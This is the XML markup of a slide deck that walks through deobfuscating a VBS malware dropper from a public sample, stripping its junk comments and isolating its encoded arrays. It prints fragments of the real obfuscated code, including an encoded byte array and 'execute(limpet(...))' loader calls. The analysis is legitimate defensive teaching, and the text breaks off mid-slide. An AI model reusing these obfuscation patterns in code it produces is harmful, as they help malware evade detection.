              <a:t>Int((0.0000001 * -7) + 9)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Int(-0.0000007 + 9)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Int(8.9999993)</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So chances of receiving a 9 value are 1 in 10,000,000</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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7^4 == 2401</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find this sample -- so you can do it too</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;12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Search for "Russian Dolls VBS Obfuscation", this article from sans.edu:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://isc.sans.edu/diary/Russian+Dolls+VBS+Obfuscation/27494</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Xavier Mertens uploaded this sample to MalwareBazaar:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://bazaar.abuse.ch/sample/2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the Nesting Dolls thing, we'll call back to this at the end.</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we get there?  A first look at the VBS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;13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sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1124850"/>
            <a:ext cx="84468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700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="accent6"/>
                </a:highlight>
              </a:rPr>
              <a:t>'a</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="accent6"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>REM prolific instrument Palermo,  7053240 Hattiesburg warden Burch Artemis premise besotted phosphorus miterwort seaworthy ipecac. superstition salesgirl headstand bladder ninebark gully Marlborough Pollard gabbro Moriarty Holloway deal tern Judson royalty torsion market, ratiocinate presentation gridlock hilt incapacity Morristown tyrosine cerebral Montevideo aloof comprehensive low Delaney Muir flourish, beplaster therapeutic</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>rUM = Array(84,97,151,7,10,7,7,7,11,7,7,7,262,262,7,7,191,7,7,7,7,7,7,7,71,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,15,8,7,7,21,38,193,21,7,187,16,212,40,191,8,83,212,40,91,111,112,122,39,119,121,118,110,121,104,116,39,106,104,117,117,118,123,3&lt;&lt;&lt;snipped&gt;&gt;&gt;,7,7,7,7,7,7)</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00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much of it is just comments?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;14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 wc -l dropper.vbs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>692 dropper.vbs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ grep -v ^"'" dropper.vbs | grep -v ^REM &gt; dropper1.vbs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ wc -l dropper1.vbs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>629 dropper1.vbs</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That's still a huge file, where do we start?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;14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49" name="Google Shape;149;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547688" y="1017725"/>
            <a:ext cx="5800725" cy="3790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separate the Assignments from the rest of the code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;15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 grep -E '= Array|=Array' dropper1.vbs &gt; assigns.vbs</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 grep -v -E '= Array|=Array' dropper1.vbs &gt; dropper2.vbs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ wc -l assigns.vbs dropper2.vbs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	556 assigns.vbs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 	73 dropper2.vbs</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	629 total</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What's left over?  Hold on, more comments to get rid of</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;16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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(rSltLvql)):</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rPr>
              <a:t>execute(limpet(fAsKosm)):'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> animism portrayal Hegelian southeast sourdough, cloister,  4058847 conductor league, ham bouillabaisse pentatonic.  1325644 aspire, gratuity.  7384074 Eduardo. saucy couple thought. vicar Quakeress glide wish glutamic typology servomechanism invocate tong elicit Lois cede taxonomic Egypt Nazi copter surveyor venal junction layette isinglass. intent centaur coachwork equanimity gargantuan salvageable651 woodland eave strongroom eluate</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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rPr>
              <a:t>execute(limpet(yEE)):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>REM stubby conclude flowchart son dachshund Carboniferous hindquarters disburse Euclidean Scheherazade sediment chase dying wage event644 k psi decapitate barricade.  6147803 boast Chaucer chance</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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rPr>
              <a:t>execute(limpet(rgmzwbIle)):</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rPr>
              <a:t>execute(limpet(GVRjBk)):</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rPr>
              <a:t>execute(limpet(HUYcmaiVH)):</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rPr>
              <a:t>execute(limpet(zwGzBJ)):</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rPr>
              <a:t>execute(limpet(VImQhn)):</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rPr>
              <a:t>execute(limpet(ApqG)):</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rPr>
              <a:t>execute(limpet(HHSutZ)):R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>EM Bela, Olivetti falsetto inflexible retaliatory character, McKinney horsemen raffia Halifax,  1546854 striate herbivore tolerable course Betty super crummy824 tamarack783 Mohammedan Rhea</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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rPr>
              <a:t>execute(limpet(anyaxMfVI)):</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rPr>
              <a:t>execute(limpet(WRY)):</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rPr>
              <a:t>execute(limpet(VTGBqYZh)):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>REM crux. Bantus bilinear gosh kinematic Sutherland Shylock84 shear featherweight278 Rankine, Crandall pseudonymous40 Ehrlich ectopic disburse914 deducible,  3114434 preclude stickleback gem funk475 Vella559 antisemitic inharmonious birefringent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blumenthal948.  3362671</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rPr>
              <a:t>execute(limpet(hgSa)):</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rPr>
              <a:t>Function limpet(hmx)</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rPr>
              <a:t>    chivalrous=1:pbI=9</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rPr>
              <a:t>    KONQLa = lbound(hmx)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    OOSUF = ubound(hmx)</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try that again, What does the code look like?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Google Shape;167;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="3612900" cy="34164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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execute(limpet(rSltLvql)):</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rPr>
              <a:t>execute(limpet(fAsKosm)):</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rPr>
              <a:t>execute(limpet(yEE)):</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rPr>
              <a:t>execute(limpet(rgmzwbIle)):</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rPr>
              <a:t>execute(limpet(GVRjBk)):</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rPr>
              <a:t>execute(limpet(HUYcmaiVH)):</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rPr>
              <a:t>execute(limpet(zwGzBJ)):</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rPr>
              <a:t>execute(limpet(VImQhn)):</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rPr>
              <a:t>execute(limpet(ApqG)):</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rPr>
              <a:t>execute(limpet(HHSutZ)):</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rPr>
              <a:t>execute(limpet(anyaxMfVI)):</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rPr>
              <a:t>execute(limpet(WRY)):</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rPr>
              <a:t>execute(limpet(VTGBqYZh)):</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rPr>
              <a:t>execute(limpet(hgSa)):</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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Function limpet(hmx)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>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rPr>
              <a:t>    chivalrous=1:pbI=9</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rPr>
              <a:t>    KONQLa = lbound(hmx)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    OOSUF = ubound(hmx)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;&lt;&lt; snipped &gt;&gt;&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4214025" y="1152175"/>
            <a:ext cx="3704400" cy="3417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execute(limpet(tbSE)):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>execute(limpet(SEFHujyIz)):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>execute(limpet(idmIdh)):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>execute(limpet(twYte)):</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ELvv</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>QSV</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Zme</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>numb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TdJb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RGOD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>bRDW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>tawny</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>baronial</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PRJh</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
